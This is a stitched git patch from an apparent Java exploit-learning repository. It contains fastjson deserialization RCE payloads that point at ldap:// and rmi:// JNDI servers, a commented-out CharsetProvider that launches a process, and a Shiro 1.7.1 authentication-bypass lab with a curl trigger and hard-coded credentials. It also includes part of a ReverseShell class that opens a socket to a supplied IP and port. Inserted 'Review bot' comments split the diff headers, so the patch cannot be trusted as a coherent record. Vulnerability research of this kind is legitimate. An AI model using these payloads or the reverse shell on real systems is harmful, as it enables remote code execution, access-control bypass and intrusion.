From 2f802e6af98433f24e08897a33aff0b37c52176f Mon Sep 17 00:00:00 2001 
From: threedr3am <929811313@qq.com> Date: Sat, 18 Sep 2021 16:22:06 +0800 Subject: [PATCH 1/5] =?UTF-8?q?=E6=B7=BB=E5=8A=A0shiro=201.7.1=20auth=20by?= =?UTF-8?q?pass?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- fastjson/pom.xml | 14 ++++ fastjson/src/main/java/Evil.java | 27 +++++++ .../bug/fastjson/rce/HadoopHikariPoc.java | 5 +- .../com/threedr3am/bug/fastjson/test/A.java | 53 ------------ .../threedr3am/bug/fastjson/test/Bypass.java | 43 ---------- .../threedr3am/bug/fastjson/test/Test.java | 79 ------------------ .../threedr3am/bug/fastjson/test/TestPoc.java | 80 ------------------- pom.xml | 1 + shiro/auth-bypass(shiro=1.7.1)/pom.xml | 38 +++++++++ .../bug/shiro/bypass/auth/Application.java | 13 +++ .../shiro/bypass/auth/config/ShiroConfig.java | 43 ++++++++++ .../auth/controller/BypassTestController.java | 24 ++++++ .../auth/controller/LoginController.java | 29 +++++++ .../bug/shiro/bypass/auth/realm/MyRealm.java | 24 ++++++ shiro/pom.xml | 2 + 15 files changed, 218 insertions(+), 257 deletions(-) create mode 100644 fastjson/src/main/java/Evil.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java delete mode 100644 fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/pom.xml create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java create mode 100644 
shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java create mode 100644 shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java diff --git a/fastjson/pom.xml b/fastjson/pom.xml index 377e76cf..a93758cc 100644 --- a/fastjson/pom.xml +++ b/fastjson/pom.xml @@ -171,5 +171,19 @@ ignite-jta 2.8.0 + + + mysql + mysql-connector-java + 8.0.14 + + + + + commons-io + commons-io + 2.7 + + \ No newline at end of file diff --git a/fastjson/src/main/java/Evil.java b/fastjson/src/main/java/Evil.java new file mode 100644 index 00000000..965e2c21 --- /dev/null +++ b/fastjson/src/main/java/Evil.java @@ -0,0 +1,27 @@ +//import java.io.IOException; +//import java.nio.charset.Charset; +//import java.util.HashSet; +//import java.util.Iterator; +// +///** +// * @author threedr3am +// */ +//public class Evil extends java.nio.charset.spi.CharsetProvider { +// +// @Override +// public Iterator charsets() { +// return new HashSet().iterator(); +// } +// +// @Override +// public Charset charsetForName(String charsetName) { +// if (charsetName.startsWith("Evil")) { +// try { +// Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); +// } catch (IOException e) { +// e.printStackTrace(); +// } +// } +// return Charset.forName("UTF-8"); +// } +//} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java index c37e6789..1d81eecb 100644 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java +++ b/fastjson/src/main/java/com/threedr3am/bug/fastjson/rce/HadoopHikariPoc.java 
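Review bot: Every line of the new `fastjson/src/main/java/Evil.java` is commented out, so the commit adds a source file that compiles to nothing and would sit in the default package if re-enabled. If it is kept as a reference fixture, say so in a short header comment and move it under a package or a resources directory that is excluded from the build. Otherwise leave it out of the commit, since commented-out code is better recovered from history than carried in the tree.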
@@ -3,6 +3,7 @@ import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.ParserConfig; import com.threedr3am.bug.common.server.LdapServer; +import com.threedr3am.bug.common.server.RmiServer; /** * fastjson <= 1.2.68 RCE,需要开启AutoType (report by threedr3am to ASRC) @@ -27,8 +28,8 @@ public class HadoopHikariPoc { public static void main(String[] args) { ParserConfig.getGlobalInstance().setAutoTypeSupport(true); - String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}"; - String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}"; +// String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}"; + String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}"; JSON.parse(payload); } } diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java deleted file mode 100644 index 1f0e5377..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/A.java +++ /dev/null 
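Review bot: The import `com.threedr3am.bug.common.server.RmiServer` added in the first hunk is not used by any line visible in either hunk of `HadoopHikariPoc.java`. The only RMI reference is the `payload` string that the second hunk comments out in `main`. I would drop both the import and the commented line, so the file holds only the one variant that actually runs. The class Javadoc and the static initialiser, if there is one, lie outside the hunks, so a use of `RmiServer` there cannot be ruled out from this view.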
@@ -1,53 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.alibaba.fastjson.serializer.SerializerFeature; - -/** - * @author xuanyh - */ -public class A { - private B b; - - public A() { - } - - public A(B b) { - this.b = b; - } - - public B getB() { - return b; - } - - public static void main(String[] args) { - ParserConfig.global.setAutoTypeSupport(true); - - String json3 = JSON.toJSONString(new A(new D()), SerializerFeature.WriteClassName); - System.out.println(json3); - - JSON.parse(json3); - - } -} - -class C implements B { - - @Override - public void x() { - - } -} - -class D implements B { - - @Override - public void x() { - - } -} - -interface B { - void x(); -} diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java deleted file mode 100644 index 30a4c0ca..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Bypass.java +++ /dev/null @@ -1,43 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; - -/** - * @author threedr3am - */ -public class Bypass { - - public static void main(String[] args) { - String json = "{\"@type\":\"java.lang.AutoCloseable\", \"@type\":\"com.threedr3am.bug.fastjson.test.AAAA\", \"rrr\": {\"@type\": \"com.threedr3am.bug.fastjson.test.BBBB\", \"eval\": \"fastjson\"}}"; - JSON.parse(json); - } - -} - -class AAAA implements AutoCloseable { - private BBBB rrr; - - public BBBB getRrr() { - return rrr; - } - - public void setRrr(BBBB rrr) { - this.rrr = rrr; - } - - @Override - public void close() throws Exception { - - } -} - -class BBBB { - private String eval; - public String getEval() { - return eval; - } - public void setEval(String eval) { - System.out.println(eval + " eval!"); - this.eval = eval; - } -} 
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java deleted file mode 100644 index bd60fcf5..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/Test.java +++ /dev/null 
@@ -1,79 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.alibaba.fastjson.serializer.SerializerFeature; - -/** - * @author xuanyh - */ -public class Test { - - public static void main(String[] args) { - System.out.println("\n1.-------"); - A a = new A(); - a.setI(1); - a.setName("threedr3am"); - String json = JSON.toJSONString(a); - System.out.println(json); - System.out.println(JSON.parse(json).getClass().getName()); - System.out.println(JSON.parseObject(json).getClass().getName()); - - System.out.println("\n2.-------"); - String json2 = JSON.toJSONString(a, SerializerFeature.WriteClassName); - System.out.println(json2); - try { - System.out.println(JSON.parse(json2).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - try { - System.out.println(JSON.parseObject(json2).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - - //todo 以上测试得出,默认不支持指定@type反序列化,即默认AutoTypeSupport=false - - System.out.println("*****************************************************************"); - ParserConfig.global.setAutoTypeSupport(true); - - String json3 = JSON.toJSONString(a, SerializerFeature.WriteClassName); - System.out.println(json3); - try { - System.out.println(JSON.parse(json3).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - try { - System.out.println(JSON.parseObject(json3).getClass().getName()); - } catch (Exception e) { - e.printStackTrace(); - } - - //todo 以上测试得出,当AutoTypeSupport=true时,JSON.parse返回具体类型,JSON.parseObject返回的是com.alibaba.fastjson.JSONObject - } - - - static class A { - - private int i; - private String name; - - public int getI() { - return i; - } - - public void setI(int i) { - this.i = i; - } - - public String getName() { - return name; - } - - public void setName(String name) { - this.name = name; - } - } -} 
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java deleted file mode 100644 index d36aaf33..00000000 --- a/fastjson/src/main/java/com/threedr3am/bug/fastjson/test/TestPoc.java +++ /dev/null 
@@ -1,80 +0,0 @@ -package com.threedr3am.bug.fastjson.test; - -import com.alibaba.fastjson.JSON; -import com.alibaba.fastjson.parser.ParserConfig; -import com.threedr3am.bug.common.server.LdapServer; - -/** - * 挖洞 - * - * @author threedr3am - */ -public class TestPoc { - - static { - //rmi server示例 -// RmiServer.run(); - - //ldap server示例 -// LdapServer.run(); - } - - public static void main(String[] args) { -// MockHttpServletRequest mockReq = new MockHttpServletRequest(); -// DefaultSavedRequest request = new DefaultSavedRequest(mockReq, new PortResolver() { -// -// public int getServerPort(ServletRequest servletRequest) { -// return 0; -// } -// }); -// -// String str = JSON.toJSONString(request, SerializerFeature.WriteClassName); -// System.out.println(str); - -// String str = "{\"rand1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"rand2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658\",\"autoCommit\":true}"; -// String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43658\",\"autoCommit\":true}}"; -// String str = "{\"@type\":\"org.springframework.security.web.savedrequest.DefaultSavedRequest\",\"contextPath\": {\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}}"; - ParserConfig.getGlobalInstance().setAutoTypeSupport(true); -// String str = "{\"a\": {\"$ref\":\"$.class\"}}"; -// AAA aaa = JSON.parseObject(str, AAA.class); -// ParserConfig.getGlobalInstance().setAutoTypeSupport(true); -// String str = "{\"a\": {\"$ref\": \"$.a\"}, \"b\": {\"$ref\": \"$.b\"}, \"c\": {\"$ref\": \"$.c\"}, \"d\": {\"$ref\": \"$.d\"}}"; -// JSON.parseObject(str, AAA.class); -// AAA aaa = new AAA(); -// System.out.println(aaa.getA()); - String json = "{\"\"}"; - JSON.parse(json); -// JSON.parseObject(str); - } -} - -class AAA { - - private String a; - - public String getA() { - System.out.println("call the getA 
method!..."); - return null; - } - - public void setA(String a) { - this.a = a; - } - - public AAA getB() { - System.out.println("call the getB method!..."); - return null; - } - - public Object getC() { - System.out.println("call the getC method!..."); - return null; - } - - public String getD() { - System.out.println("call the getD method!..."); - return null; - } - - -} diff --git a/pom.xml b/pom.xml index c8406bc2..2a018d87 100644 --- a/pom.xml +++ b/pom.xml @@ -27,6 +27,7 @@ nexus apache-poi java-compile + auth-bypass(shiro=1.7.1) learn-java-bug diff --git a/shiro/auth-bypass(shiro=1.7.1)/pom.xml b/shiro/auth-bypass(shiro=1.7.1)/pom.xml new file mode 100644 index 00000000..8a78d05c --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/pom.xml @@ -0,0 +1,38 @@ + + + + org.springframework.boot + spring-boot-starter-parent + 1.5.22.RELEASE + + + 4.0.0 + + auth-bypass(shiro=1.7.1) + + + 8 + 8 + + + + + org.springframework.boot + spring-boot-starter-web + + + + org.apache.shiro + shiro-web + 1.7.1 + + + org.apache.shiro + shiro-spring + 1.7.1 + + + + \ No newline at end of file diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java new file mode 100644 index 00000000..a134e7a3 --- /dev/null +++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java @@ -0,0 +1,13 @@ +package me.threedr3am.bug.shiro.bypass.auth; + +import org.springframework.boot.SpringApplication; +import org.springframework.boot.autoconfigure.SpringBootApplication; + +@SpringBootApplication +public class Application { + + public static void main(String[] args) { + SpringApplication.run(Application.class, args); + } + +} \ No newline at end of file 
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java
new file mode 100644
index 00000000..d9158717
--- /dev/null
+++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java
@@ -0,0 +1,43 @@
+package me.threedr3am.bug.shiro.bypass.auth.config;
+
+import me.threedr3am.bug.shiro.bypass.auth.realm.MyRealm;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+import java.util.LinkedHashMap;
+import java.util.Map;
+
+/**
+ * @author threedr3am
+ */
+@Configuration
+public class ShiroConfig {
+ @Bean
+ MyRealm myRealm() {
+ return new MyRealm();
+ }
+
+ @Bean
+ SecurityManager securityManager() {
+ DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
+ manager.setRealm(myRealm());
+ return manager;
+ }
+
+ @Bean
+ ShiroFilterFactoryBean shiroFilterFactoryBean() {
+ ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
+ bean.setSecurityManager(securityManager());
+ bean.setLoginUrl("/login");
+ bean.setSuccessUrl("/index");
+ Map map = new LinkedHashMap();
+ map.put("/login", "anon");
+ map.put("/bypass/*/index", "authc");
+ map.put("/bypass/threedr3am/index", "anon");
+ bean.setFilterChainDefinitionMap(map);
+ return bean;
+ }
+}
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java
new file mode 100644
index 00000000..2792884b
--- /dev/null
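Review bot: The filter chain built in `shiroFilterFactoryBean()` has no comment saying that its rule order is a deliberate lab fixture, so a reader cannot tell it apart from a recommended configuration. The `anon` entry for `/bypass/threedr3am/index` is registered after the broader `authc` pattern `/bypass/*/index`, so with first-match chain resolution the later rule should never be selected. That overlap appears to be what this shiro 1.7.1 module exists to exercise. I would put above the `map.put` calls: `// Lab fixture for CVE-2021-41303: overlapping patterns on purpose; do not reuse this chain outside the demo.` The map is shown as raw `Map`/`LinkedHashMap`; unless that is a rendering artefact, declare it as `Map<String, String>`.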
+++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java
@@ -0,0 +1,24 @@
+package me.threedr3am.bug.shiro.bypass.auth.controller;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RestController;
+
+/**
+ * CVE-2021-41303
+ * curl http://127.0.0.1/bypass/threedr3am/index/
+ *
+ * @author threedr3am
+ */
+@RestController
+public class BypassTestController {
+
+ /**
+ * @return
+ */
+ @RequestMapping(value = "/bypass/{id}/index", method = RequestMethod.GET)
+ public String bypass(@PathVariable(name = "id") String id) {
+ return "bypass1 -> " + id;
+ }
+}
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java
new file mode 100644
index 00000000..e7dd4586
--- /dev/null
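Review bot: The Javadoc on `bypass()` is an empty `@return`, and the class comment gives only a CVE id and a curl line, so the expected outcome of the check is not documented. Say what the handler returns and what it means, for example `@return the echoed path variable; a response from here without a login means the authc rule was not applied`, and note which Shiro version is expected to answer with the login redirect instead. The curl URL carries no port, and this patch lists no `application.yml` for the module, so Spring Boot's default of 8080 would apply unless `server.port` is set elsewhere. The handler echoes `id` into the response unencoded, which is acceptable for a local lab but deserves a one-line comment saying so.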
@@ -0,0 +1,29 @@
+package me.threedr3am.bug.shiro.bypass.auth.controller;
+
+import org.apache.shiro.SecurityUtils;
+import org.apache.shiro.authc.AuthenticationException;
+import org.apache.shiro.authc.UsernamePasswordToken;
+import org.apache.shiro.subject.Subject;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RestController;
+
+/**
+ * @author threedr3am
+ */
+@RestController
+public class LoginController {
+
+ @RequestMapping(value = "/login", method = RequestMethod.POST)
+ public String login(String username, String password) {
+ Subject subject = SecurityUtils.getSubject();
+ try {
+ subject.login(new UsernamePasswordToken(username, password));
+ return "登录成功!";
+ } catch (AuthenticationException e) {
+ e.printStackTrace();
+ return "登录失败!";
+ }
+
+ }
+}
diff --git a/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java
new file mode 100644
index 00000000..58d2897a
--- /dev/null
+++ b/shiro/auth-bypass(shiro=1.7.1)/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java
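Review bot: The `catch (AuthenticationException e)` branch in `login()` calls `e.printStackTrace()`, which writes every failed login to stderr with no level, context or rate control. Route it through a logger instead, e.g. `log.warn("login failed", e);`; no logger field is visible in this file, so one would have to be added. Success and failure both return a plain string with the default 200 status, so clients and monitoring cannot tell them apart by status code, and a 401 on the failure path would make rejected logins observable. The blank line before the method's closing brace can go.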
@@ -0,0 +1,24 @@
+package me.threedr3am.bug.shiro.bypass.auth.realm;
+
+import org.apache.shiro.authc.*;
+import org.apache.shiro.authz.AuthorizationInfo;
+import org.apache.shiro.realm.AuthorizingRealm;
+import org.apache.shiro.subject.PrincipalCollection;
+
+/**
+ * @author threedr3am
+ */
+public class MyRealm extends AuthorizingRealm {
+ @Override
+ protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principals) {
+ return null;
+ }
+ @Override
+ protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken token) throws AuthenticationException {
+ String username = (String) token.getPrincipal();
+ if (!"threedr3am".equals(username)) {
+ throw new UnknownAccountException("账户不存在!");
+ }
+ return new SimpleAuthenticationInfo(username, "123456", getName());
+ }
+}
diff --git a/shiro/pom.xml b/shiro/pom.xml
index 1c3eef48..f108c2d1 100644
--- a/shiro/pom.xml
+++ b/shiro/pom.xml
@@ -13,6 +13,8 @@ pom + auth-bypass(shiro=1.7.1) + auth-bypass-shiro-1.4.1 From e3b6694a59006eabd358f05c22f3a1aac89e2a91 Mon Sep 17 00:00:00 2001
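Review bot: `doGetAuthenticationInfo()` hard-codes the account name `threedr3am` and the password `123456` in source, and nothing in `MyRealm` marks them as lab-only values. Add a class comment such as `// Demo realm: fixed test credentials, never deploy this class`, or read the pair from configuration. `doGetAuthorizationInfo()` returns `null`, whereas `return new SimpleAuthorizationInfo();` would state "no roles, no permissions" explicitly. The wildcard import `org.apache.shiro.authc.*` can be replaced by the five types the class actually uses.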
From: threedr3am <929811313@qq.com> Date: Tue, 21 Jun 2022 20:33:25 +0800 Subject: [PATCH 2/5] add CVE-2022-22980 Learning Demo --- common/src/main/java/ReverseShell.java | 202 +++++++++--------- pom.xml | 81 +++---- .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 .../src/main/resources/application.yml | 0 .../pom.xml | 2 +- .../bug/shiro/bypass/auth/Application.java | 0 .../shiro/bypass/auth/config/ShiroConfig.java | 0 .../auth/controller/BypassTestController.java | 0 .../auth/controller/LoginController.java | 0 .../bug/shiro/bypass/auth/realm/MyRealm.java | 0 shiro/auth-bypass-shiro-1-8-0/pom.xml | 38 ++++ .../bug/shiro/bypass/auth/Application.java | 13 ++ .../shiro/bypass/auth/config/ShiroConfig.java | 39 ++++ .../auth/controller/BypassTestController.java | 22 ++ .../auth/controller/LoginController.java | 29 +++ .../bug/shiro/bypass/auth/realm/MyRealm.java | 24 +++ shiro/pom.xml | 8 +- spring/pom.xml | 1 + .../README.md | 15 ++ .../pom.xml | 39 ++++ .../bug/spring/data/mongodb/Application.java | 15 ++ .../mongodb/controller/DemoController.java | 22 ++ .../bug/spring/data/mongodb/entity/Demo.java | 9 + .../mongodb/repository/DemoRepository.java | 13 ++ .../src/main/resources/application.yml | 8 + 43 
files changed, 434 insertions(+), 152 deletions(-) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/pom.xml (96%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-4-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/pom.xml (95%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<=1.4.1) => auth-bypass-shiro-1-5-1}/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.2) => auth-bypass-shiro-1-5-1}/src/main/resources/application.yml (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/pom.xml (94%) rename shiro/{auth-bypass(shiro<1.5.3) => 
auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) rename shiro/{auth-bypass(shiro<1.5.3) => auth-bypass-shiro-1-5-3}/src/main/resources/application.yml (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/pom.xml (95%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java (100%) rename shiro/{auth-bypass(shiro=1.7.1) => auth-bypass-shiro-1-7-1}/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java (100%) create mode 100644 shiro/auth-bypass-shiro-1-8-0/pom.xml create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/Application.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java create mode 100644 
shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java create mode 100644 shiro/auth-bypass-shiro-1-8-0/src/main/java/me/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/README.md create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/pom.xml create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/Application.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/controller/DemoController.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/entity/Demo.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/java/com/threedr3am/bug/spring/data/mongodb/repository/DemoRepository.java create mode 100644 spring/spring-data-mongodb-spel-CVE-2022-22980/src/main/resources/application.yml diff --git a/common/src/main/java/ReverseShell.java b/common/src/main/java/ReverseShell.java index ecd5d6b0..6b97d042 100644 --- a/common/src/main/java/ReverseShell.java +++ b/common/src/main/java/ReverseShell.java 
@@ -15,113 +15,117 @@ public class ReverseShell implements Runnable { - private String ip; - private Integer port; + private String ip; + private Integer port; - private InputStream inputStream; - private OutputStream outputStream; + private InputStream inputStream; + private OutputStream outputStream; - public ReverseShell(String ip, Integer port) { - this.ip = ip; - this.port = port; - new Thread(this).start(); - } - - public ReverseShell(InputStream inputStream, OutputStream outputStream) { - this.inputStream = inputStream; - this.outputStream = outputStream; - new Thread(this).start(); - } + public ReverseShell(String ip, Integer port) { + this.ip = ip; + this.port = port; + new Thread(this).start(); + } - @Override - public void run() { - if (outputStream != null && inputStream != null) { - try { - BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream)); - BufferedReader read = new BufferedReader(new InputStreamReader(inputStream)); - String line2; - while ((line2 = read.readLine()) != null) { - bufferedWriter.write(line2); - bufferedWriter.newLine(); - bufferedWriter.flush(); - } - } catch (Exception e) {} - } else { - try { - Socket socket = new Socket(ip, port); - BufferedWriter bufferedWriter = new BufferedWriter( - new OutputStreamWriter(socket.getOutputStream())); - bufferedWriter.write("success!"); - bufferedWriter.newLine(); - bufferedWriter.flush(); + public 